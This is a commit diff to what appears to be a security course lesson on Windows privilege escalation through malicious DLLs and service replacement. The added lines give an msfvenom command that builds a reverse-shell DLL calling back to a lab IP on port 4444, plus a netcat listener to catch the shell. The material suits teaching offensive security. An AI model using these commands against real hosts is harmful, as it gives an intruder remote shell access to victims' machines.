Merge branch 'temp-sg-branch' into 'master'

Temp sg branch See merge request !67

Merge branch 'temp-sg-branch' into 'master'
Temp sg branch See merge request !67
4b6e65c4 · Bryan Gagne · 03cffc0f · 312df0aa · 4b6e65c4
Commit 4b6e65c4 authored 2 years ago by Bryan Gagne
--- a/security/modules/lessons/pages/lesson-9-windows-exploit_sg.adoc
+++ b/security/modules/lessons/pages/lesson-9-windows-exploit_sg.adoc
@@ -375,6 +375,9 @@ BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
 . The ``-Wl,`` Creates a shared object (a DLL) from source.o named ``bad.dll``. It also creates an import library name ``bad.a`` for the DLL which isn't used for this exploit:
 * ``i686-w64-mingw32-g++ -shared -o bad.dll bad.o -Wl,--out-implib,bad.a``

+. Alternative method for DLL creation using MSFVenom
+* ``msfvenom -p windows/shell_reverse_tcp LHOST=10.50.x.x LPORT=4444 -f dll > bad.dll``
+
 Once the malicious dll has been createdit must be uploaded to the host. Use scp, ftp, nc, python simple HTTP server, or copying and pasting base64 dump of file.

 . Alternative method for DLL creation using MSFVenom
@@ -465,6 +468,8 @@ The overall intent is to replace the legitimate service with an executable that
 NOTE: *networkedservice2* is a malicious service, but any executable can be transfered to the target and used

 [start=3]
+. If using custom reverse shell, setup a netcat listener
+* ``nc -lvp 4444``
 . Start the service
 * ``net start testService2`` 
 . Check to make sure the service is functional